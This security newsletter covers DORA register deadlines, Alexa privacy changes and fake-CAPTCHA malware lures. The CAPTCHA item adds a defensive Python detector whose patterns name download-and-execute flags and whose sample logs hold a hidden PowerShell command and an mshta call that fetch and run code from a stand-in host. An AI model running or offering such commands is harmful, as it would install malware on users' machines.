This week:

3 – DORA’s Register of Information: Chaos Theory In Real Life

2 – Captcha: How a fake CAPTCHA could catch you out

1 – Alexa: The constant trade-off between convenience and privacy

 


 

3 – DORA’s Register of Information: Chaos Theory In Real Life

 

“Financial entities subject to the Digital Operational Resilience Act (DORA) (Regulation (EU) 2022/2554) will be required to submit Registers of Information (RoIs) in relation to all contractual arrangements on the use of ICT services provided by ICT third-party service providers [between] 1 to 4 April 2025.”

 

What’s the story?

If DORA is not something you need to worry about, share a thought for everyone who does, because this week is a big week in DORA Land.

Each financial entity subject to DORA needs to submit its ‘Register of Information’ (RoI) by the end of the week.

No big deal, you say. Another month, another regulatory deadline.

And that’s true.

 

So what? 

I’m not seeing anyone talking about this online, but in private 1:1 conversations with many of the teams dealing with this, I hear that this whole process has been chaotic*. (*The language used is more colourful than ‘chaotic’, but I’ll keep it clean).

And I can understand why.

The technical standards for the RoI were only officially published a few months ago. And apparently, with just days to go before the deadline, regulatory guidance on what is expected of regulated firms continues to be ‘finessed’.

So, if you’re part of a team struggling with your RoI, you’re not the only one.

And unfortunately, it sounds like we all need to be ready for lots of rejections and rework after the regulators have reviewed the submissions.

 

Source:

Central Bank of Ireland’s DORA Register of Information Page

 


 

2 – Captcha: How a fake CAPTCHA could catch you out

 

“There are more and more sites that [..] instruct victims on how to infect their own machine. [..] It usually starts on a website that promises visitors some kind of popular content: Movies, music, pictures, news articles, you name it. Nobody will think twice when they are asked to prove they are not a robot. [..] If you follow the steps you will actually be infecting yourself with malware.”

 

What’s the story?

Malicious websites are employing fake CAPTCHA verifications to trick users into infecting their own Windows devices with malware.

These sites silently copy a PowerShell command to the user’s clipboard and then dress up the ‘verification’ as a short sequence of keystrokes that paste and run it (typically by opening the Windows Run dialog, pasting, and pressing Enter). The command runs hidden, fetches the payload, and installs information-stealing malware.

Below is a screenshot of what this attack looks like:

[Screenshot: a fake CAPTCHA instructing users to run a hidden PowerShell command]

 

So what?

The likelihood of this attack succeeding can be significantly reduced by:

  1. Avoiding websites that promise ‘free’ access to paid-for content (e.g. movies; sports; pictures; music). If you’re not paying for the product, you are the product.
  2. Treating any ‘verification’ step that asks you to press keyboard shortcuts, paste something, or run a command as a red flag. A genuine CAPTCHA only ever asks you to click, type characters or pick images; it never needs you to run anything.
  3. Using up-to-date anti-malware / endpoint protection software on your Windows device.
  4. Ensuring you do not log in to your Windows device with an account that has ‘Administrator’ access – Your day-to-day account should only have ‘Standard’ access. ‘Administrator’ access should be reserved for special occasions. (A standard account limits how deep the malware can dig in, but an information stealer running as you can still read your own browser passwords, cookies and files, so this is a damage limiter, not a cure.)

Otherwise, proving ‘I’m not a robot’ may prove to be the wrong thing to do.
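For teams that run endpoint telemetry, the same attack leaves a recognisable trace: a scripting interpreter launched by the desktop shell (i.e. by the user, not by a scheduler or management agent) with a command line full of ‘hidden window’, ‘download and execute’ flags. Below is an added example of a simple detection rule over process-creation events. It is not code from this newsletter or from Malwarebytes; the field names follow Sysmon Event ID 1 conventions, the patterns, weights and threshold are my own assumptions to be tuned per environment, the lure-comment check (‘I am not a robot …’ appended so the Run dialog looks harmless) is an assumption based on commonly reported variants, and the four log records (including the hostname lure.example) are constructed for illustration.

```python
"""Heuristic detection of fake-CAPTCHA 'paste and run' infections from
process-creation telemetry.

Added example; not code from the newsletter or from Malwarebytes.
Field names follow Sysmon Event ID 1 (ParentImage, Image, CommandLine),
but any feed exposing parent, image and command line will do.
Patterns, weights and threshold are assumptions: tune them locally.
"""
import json
import re
from dataclasses import dataclass, field
from typing import Optional

# Interpreters the pasted one-liner usually starts (assumption: extend as needed).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}

# Parents that mean "a person launched this from the desktop / Run dialog",
# as opposed to a scheduled task, service or management agent.
USER_SHELL_PARENTS = {"explorer.exe"}

# Command-line features typical of the command a victim is told to paste.
# Each hit adds one point; the labels end up in the finding as reasons.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"-(w|window|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"-(ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I), "remote download"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "invoke-expression"),
    (re.compile(r"\bmshta(\.exe)?\s+https?://", re.I), "mshta remote hta"),
    # Assumed lure: a trailing comment so the Run box shows reassuring text.
    (re.compile(r"I am not a robot|reCAPTCHA|Verification ID", re.I), "captcha lure text"),
]

FLAG_THRESHOLD = 2  # interactive launch + one suspicious flag, or two flags


@dataclass
class Finding:
    record_id: int
    image: str
    score: int
    reasons: list = field(default_factory=list)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> Optional[Finding]:
    """Return a Finding if the event looks like a pasted paste-and-run command."""
    image = basename(event.get("Image", ""))
    if image not in INTERPRETERS:
        return None
    reasons = []
    if basename(event.get("ParentImage", "")) in USER_SHELL_PARENTS:
        reasons.append("launched interactively from the desktop shell")
    cmdline = event.get("CommandLine", "")
    for pattern, label in SUSPICIOUS_PATTERNS:
        if pattern.search(cmdline):
            reasons.append(label)
    if len(reasons) < FLAG_THRESHOLD:
        return None
    return Finding(event.get("RecordId", -1), image, len(reasons), reasons)


def scan(jsonl: str) -> list:
    """Run score_event over a JSON-lines export of process-creation events."""
    findings = []
    for line in jsonl.splitlines():
        if line.strip():
            finding = score_event(json.loads(line))
            if finding:
                findings.append(finding)
    return findings


# Constructed sample: 101 = user opens a console (benign), 102 = pasted lure,
# 103 = scheduled admin script (benign), 104 = mshta variant of the lure.
SAMPLE_EVENTS = r"""
{"RecordId": 101, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\""}
{"RecordId": 102, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -ep bypass -c \"iwr https://lure.example/verify.txt | iex\" # I am not a robot - reCAPTCHA Verification ID: 8261"}
{"RecordId": 103, "ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\nightly-backup.ps1"}
{"RecordId": 104, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta https://lure.example/verify.hta"}
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"record {f.record_id}: {f.image} score={f.score} reasons={f.reasons}")
```

Only records 102 and 104 are flagged: the benign console launch (101) scores one point for being interactive and nothing else, and the scheduled backup script (103) scores one point for the execution-policy bypass but was not started from the desktop shell. That is the design point: no single feature is damning on its own, it is the combination of ‘a human started it’ and ‘it behaves like a dropper’ that marks the paste-and-run pattern.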

 

Source:

MalwareBytes

 


 

1 – Alexa: The constant trade-off between convenience and privacy

 

“Amazon has disabled two key privacy features in its Alexa smart speakers, in a push to introduce artificial intelligence-powered ‘agentic capabilities’ and turn a profit from the popular devices.”

 

What’s the story?

As of Friday, Amazon has removed two privacy features from its Alexa devices:

  • The ability to process voice commands locally, and
  • The option to prevent recordings from being sent to the cloud.

Now, all voice data will be sent to Amazon’s cloud servers for processing, and choosing not to save recordings will disable future personalisation features.

 

So what?

Every time I walk into our kitchen, I pull the plug on our Alexa device (and plug out all the chargers that are not actually charging anything, but let’s not talk about that.)

As soon as anyone else walks into the kitchen, they plug Alexa back in.

In other words, Alexa is an excellent ‘real world’ example of how our constantly-connected world presents us with frequent trade-offs between convenience and privacy.

And we all have different views on what the trade-off should be.

 

Source:

The UK Independent